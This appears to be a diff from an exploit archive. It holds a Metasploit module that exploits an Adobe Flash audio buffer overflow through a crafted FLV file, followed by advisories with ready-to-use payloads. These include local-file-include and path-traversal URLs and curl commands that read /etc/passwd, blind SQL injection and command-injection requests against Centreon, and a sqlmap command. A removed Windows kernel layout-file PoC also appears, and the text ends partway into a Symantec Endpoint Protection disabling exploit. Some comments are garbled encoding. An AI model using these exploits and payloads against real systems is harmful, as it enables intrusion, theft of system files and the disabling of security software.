# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
@flv = create_flv
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
if request.uri =~ /\.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset
data = ''
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "\xee" * 0x440 # SoundData
tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "\x00\x04\x41" # DataSize
tag1 << "\x00\x00\x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "\x00\x00\x00" # StreamID, always 0
tag1 << data
body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize
flv = ''
flv << header
flv << body
flv
end
end

7
platforms/php/webapps/37519.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/54611/info
The 'com_hello' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00

9
platforms/php/webapps/37520.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54613/info
Maian Survey is prone to a URI-redirection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to execute arbitrary local files within the context of the webserver process or redirect users to a potentially malicious site. This may aid in phishing attacks or allow the attacker to compromise the application; other attacks are also possible.
Maian Survey 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/[PATH]/admin/index.php?cmd=LF�°_here

34
platforms/php/webapps/37521.txt Executable file
View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/54620/info
CodeIgniter is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass XSS filter protections and perform cross-site scripting attacks.
CodeIgniter versions prior to 2.1.2 are vulnerable.
Build an application on CodeIgniter 2.1.0:
// application/controllers/xssdemo.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Xssdemo extends CI_Controller {
public function index() {
$data['xss'] =
$this->security->xss_clean($this->input->post('xss'));
$this->load->view('xssdemo', $data);
}
}
// application/views/xssdemo.php
<form method=post>
<textarea name=xss><?php echo htmlspecialchars($xss);
?>&lt;/textarea&gt;
<input type=submit />
</form>
<p>XSS:
<hr />
<?php echo $xss ?>
Launch http://app-uri/index.php/xssdemo and try above vectors.

7
platforms/php/webapps/37522.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/54635/info
The chenpress plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
http://www.example.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

64
platforms/php/webapps/37528.txt Executable file
View file

@ -0,0 +1,64 @@
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
CVEs: CVE-2015-1560, CVE-2015-1561
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)
Advisory introduction:
Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request.
PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si
d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27
By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561.
================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
$command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters.
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting command into "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t
oday&session_id=[valid session_id]
- Injecting "uname ?a" into "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/ge
tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%
23&session_id=[valid session_id]
Combining two vulnerabilities, an unauthenticated attacker can take control of the web server.
================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi
13/02/2015 - Vendor fixed RCE
References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21
3b9c60de1bad0b464fd6403c828cf12582
About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.

43
platforms/php/webapps/37529.txt Executable file
View file

@ -0,0 +1,43 @@
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mukto@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.
Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be
downloaded:
$file_name = $_GET['file'];
// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
case 'pdf': $mime = 'application/pdf'; break;
case 'zip': $mime = 'application/zip'; break;
case 'jpeg':
case 'jpg': $mime = 'image/jpg'; break;
default: $mime = 'application/force-download';
}
header('Pragma: public'); // required
header('Expires: 0'); // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
header('Cache-Control: private',false);
header('Content-Type: '.$mime);
header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($file_name)); // provide file size
header('Connection: close');
readfile($file_name); // push it out
exit();
CVEID: Requested, TBD.
OSVDB: TBD.
Exploit Code:
• $ curl http://server/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd

27
platforms/php/webapps/37530.txt Executable file
View file

@ -0,0 +1,27 @@
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.
1 <?php
2 require_once("../../../../wp-admin/admin.php");
3
4 header('Content-disposition: attachment; filename='.$_GET['filename']);
5 header('Content-type: application/pdf');
6 readfile(HAET_INVOICE_PATH.$_GET['filename']);
7 ?>
You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path.
CVEID: Requested TBD
OSVDB: TBD
Exploit Code:
• $ curl http://server/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd

95
platforms/php/webapps/37534.txt Executable file
View file

@ -0,0 +1,95 @@
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.
90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));
.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s',
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName'])))
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));
In MapPinImageSave.php, code isnt sanitized when creating a directory allowing ../ to create files outside of intended directory:
4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

293
platforms/windows/dos/36327.txt
View file

@ -1,293 +0,0 @@
source: http://www.securityfocus.com/bid/50763/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
Crash:
/*
win7
Access violation - code c0000005 (!!! second chance !!!)
win32k!ReadLayoutFile+0x62:
9566d591 8b4834 mov ecx,dword ptr [eax+34h]
kd> r
eax=ffffffe8 ebx=00000000 ecx=fe978b2e edx=000000e0 esi=fe4e0168 edi=00000000
eip=9566d591 esp=985ad8a0 ebp=985ad8bc iopl=0 nv up ei pl nz ac pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010217
win32k!ReadLayoutFile+0x62:
9566d591 8b4834 mov ecx,dword ptr [eax+34h] ds:0023:0000001c=????????
kd> kb
ChildEBP RetAddr Args to Child
985acf5c 83d1b083 00000003 bc9827e2 00000065 nt!RtlpBreakWithStatusInstruction
985acfac 83d1bb81 00000003 985ad3b0 00000000 nt!KiBugCheckDebugBreak+0x1c
985ad370 83d1af20 0000008e c0000005 9566d591 nt!KeBugCheck2+0x68b
985ad394 83cf108c 0000008e c0000005 9566d591 nt!KeBugCheckEx+0x1e
985ad7bc 83c7add6 985ad7d8 00000000 985ad82c nt!KiDispatchException+0x1ac
985ad824 83c7ad8a 985ad8bc 9566d591 badb0d00 nt!CommonDispatchException+0x4a
985ad8bc 9566dc6a fe4e0168 80000984 00000160 nt!Kei386EoiHelper+0x192
985ad8dc 95669b7b 80000984 00000160 000001ae win32k!LoadKeyboardLayoutFile+0x70
985ad968 9567c21e 883bf4b0 80000984 08040804 win32k!xxxLoadKeyboardLayoutEx+0x1be
985ad9a4 9566a275 883bf4b0 80000984 08040804 win32k!xxxSafeLoadKeyboardLayoutEx+0x93
985add0c 83c7a1ea 00000038 00000160 000001ae win32k!NtUserLoadKeyboardLayoutEx+0x119
985add0c 777970b4 00000038 00000160 000001ae nt!KiFastCallEntry+0x12a
001ff470 0111c58c 0111c76a 00000038 00000160 ntdll!KiFastSystemCallRet
WARNING: Stack unwind information not available. Following frames may be wrong.
001ff9f8 0111c956 00000000 00000000 7ffd9000 ms10_73+0x2c58c
Details£º
WIN7
.text:BF80D538 push eax ; int
.text:BF80D539 push 40000h ; int
.text:BF80D53E push 40h ; int
.text:BF80D540 push [ebp+start_buffer] ; FileHandle
.text:BF80D543 mov [ebp+plength], ebx
.text:BF80D546 mov [ebp+ppbuffer], ebx
.text:BF80D549 mov [ebp+var_10], ebx
.text:BF80D54C call _LoadFileContent@20 ; LoadFileContent(x,x,x,x,x)
.text:BF80D551 test eax, eax
.text:BF80D553 jl loc_BF80D6F1
.text:BF80D559 mov ecx, [ebp+ppbuffer] ¹¹Ôì¶ÑµØÖ·+3ch´¦µÄdword =0xffffffxx ¼´¿ÉÈƹý¼ì²â£¬µ¼ÖÂBSOD
.text:BF80D55C mov eax, [ecx+3Ch] //ÐèÒª²Â²â¶ÑµÄµØÖ·
.text:BF80D55F add eax, ecx
.text:BF80D561 cmp eax, ecx
.text:BF80D563 jb loc_BF80D6F1
.text:BF80D569 mov ecx, [ebp+plength]
.text:BF80D56C mov edx, [ebp+ppbuffer]
.text:BF80D56F add ecx, edx
.text:BF80D571 lea edx, [eax+0F8h]
.text:BF80D577 mov [ebp+plength], ecx
.text:BF80D57A cmp edx, ecx
.text:BF80D57C jnb loc_BF80D6F1
.text:BF80D582 mov ecx, [eax+34h] ----->crash
winxp
.text:BF8821D7 push eax ; ViewSize
.text:BF8821D8 push esi ; SectionOffset
.text:BF8821D9 push esi ; CommitSize
.text:BF8821DA push esi ; ZeroBits
.text:BF8821DB lea eax, [ebp+BaseAddress]
.text:BF8821DE push eax ; BaseAddress
.text:BF8821DF push 0FFFFFFFFh ; ProcessHandle
.text:BF8821E1 push [ebp+Handle] ; SectionHandle
.text:BF8821E4 call ds:__imp__ZwMapViewOfSection@40 ; ZwMapViewOfSection(x,x,x,x,x,x,x,x,x,x)
.text:BF8821EA test eax, eax
.text:BF8821EC jl loc_BF88238A
.text:BF8821F2 mov ecx, [ebp+BaseAddress]
.text:BF8821F5 mov eax, [ecx+3Ch]
.text:BF8821F8 add eax, ecx
.text:BF8821FA movzx edx, word ptr [eax+6] -----¡µcrash
// poc.cpp : ¶¨Òå¿ØÖÆ̨ӦÓóÌÐòµÄÈë¿Úµã¡£
//
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#pragma comment(lib,"User32.lib")
#define MAGIC_OFFSET 0x6261
#define WIN7 1
#define InitializeUnicodeStr(p,s) { \
(p)->Length= wcslen(s)*2; \
(p)->MaximumLength = wcslen(s)*2+2; \
(p)->Buffer = s; \
}
#if WIN7
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
IN HANDLE Handle,
IN DWORD offTablelow,
IN DWORD offTableHigh,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
)
{
__asm
{
mov eax,11E3h
mov edx, 7ffe0300h
call dword ptr [edx]
ret 20h
}
}
#else
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
IN HANDLE Handle,
IN DWORD offTable,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
)
{
__asm
{
mov eax, 000011c6h
mov edx, 7ffe0300h
call dword ptr [edx]
retn 1Ch
}
}
#endif
unsigned char fakeDll2[]="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x44\x01"//0x40 00 00 00 base=fdbbca98 fdbbca00 02443500
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"//
"\x00\x00\x00\x00\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x2E\x64\x61\x74\x61\x00\x00\x00"
"\xE6\x00\x00\x00\x60\x01\x00\x00\xE6\x00\x00\x00\x60\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\x9E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"//crash?? 94 10
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xA6\x01\x00\x00\xAA\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x9C\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\xC2\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"//index
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
;
UNICODE_STRING uStr;
UNICODE_STRING uKerbordname;
VOID boom_loadlayout()
{
KEYBDINPUT kb={0};
INPUT vInput={0};
HANDLE hFile;
DWORD dwFuckS0ny;
HKL hKbd;
WCHAR lpPath[MAX_PATH]={0};
WCHAR lpLayoutFile[MAX_PATH]={L"C:\\Windows\\System32\\lSp0wns.boom111"};
LPVOID lpShellPtr;
//strcpy( lpLayoutFile, L"%lSp0wns.boom111", lpPath);
hFile = CreateFileW(lpLayoutFile,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
0,0);
if( hFile == INVALID_HANDLE_VALUE )
{
printf(" \n[!!] Error:errorcode:%x\n",GetLastError());
exit(0);
}
WriteFile( hFile,
fakeDll2,
sizeof(fakeDll2)-1,
&dwFuckS0ny,
NULL);
//printf("\n[+] Writing malformed kbd layout file \n\t\"%S\"\n\t[ %d ] bytes written\n",lpLayoutFile,dwFuckS0ny);
CloseHandle(hFile);
hFile = CreateFileW (lpLayoutFile,
GENERIC_READ,
FILE_SHARE_READ,
0,
OPEN_EXISTING,
0,0);
if( hFile == INVALID_HANDLE_VALUE )
{
printf(" \n[!!] Error\n");
exit(0);
}
hKbd = GetKeyboardLayout( GetWindowThreadProcessId( GetForegroundWindow(), &dwFuckS0ny ) );
printf("\n[+] Loading it...[ 0x%x ]\n", NtUserLoadKeyboardLayoutEx( hFile, 0x0160,0x01AE,&uKerbordname, hKbd, &uStr, 0x666, 0x101 ) );// 0x101
/*HKL NTAPI NtUserLoadKeyboardLayoutEx ( IN HANDLE Handle,
IN DWORD offTable,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
) */
//win7ÏÂÃæÕâ¸öº¯ÊýÊǸö²ÎÊýÀ´ÆäÖÐoffTable²ð·Ö³É¸ö
//ÎļþÒ»¶¨Òª·ÅÔÚsystem32Ŀ¼ÏÂÃ治Ȼ´¥·¢²»ÁË
CloseHandle(hFile);
//printf("\n[+] Done\n");
}
int _tmain(int argc, _TCHAR* argv[])
{
LoadLibraryA("user32.dll");
InitializeUnicodeStr(&uStr,L"p3d.dll");//ÏÖÔÚ±ØÐëСÓÚ³¤¶È
//fix by instruder
InitializeUnicodeStr(&uKerbordname,L"A");
uKerbordname.MaximumLength=0;
for (int j=0;j<=2;j++)
{
for (int i1=0;i1<=0xff;i1++)
{
for (int i2=0;i2<0xff;i2++)
{
printf("%x,%x\n",i1,i2);
fakeDll2[0x3d]=i1;
fakeDll2[0x3e]=i2;
fakeDll2[0x3f]=j;
boom_loadlayout();
}
}
}
return 0;
}//

214
platforms/windows/dos/37525.c Executable file
View file

@ -0,0 +1,214 @@
# Exploit Title: Antivirus
# Google Dork: intitle: Antivirus
# Date: 2015-07-07
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.symantec.com
# Software Link: www.symantec.com/endpoint-protection
# Version:12.1.4013
# Tested on: windows 7 SP1
# Category: Antivirus
Vendor:
================================
Symantec ( www.symantec.com )
Product:
================================
Symantec EP 12.1.4013
Advisory Information:
================================================
Disabling Vulnerability
Vulnerability Details:
=====================
Symantec EP agent & services can be rendered useless even after globally
locking
down endpoint protection via a Symantec central management server and
enabling
globally managed password protection controls. Tested successfully on
Windows 7 SP1 result may vary OS to OS.
Exploit code(s):
===============
#include <windows.h>
#include <Tlhelp32.h>
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"
/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015
Goal:
Kill Symantec EP agent & services after globally locking down endpoint
protection via the
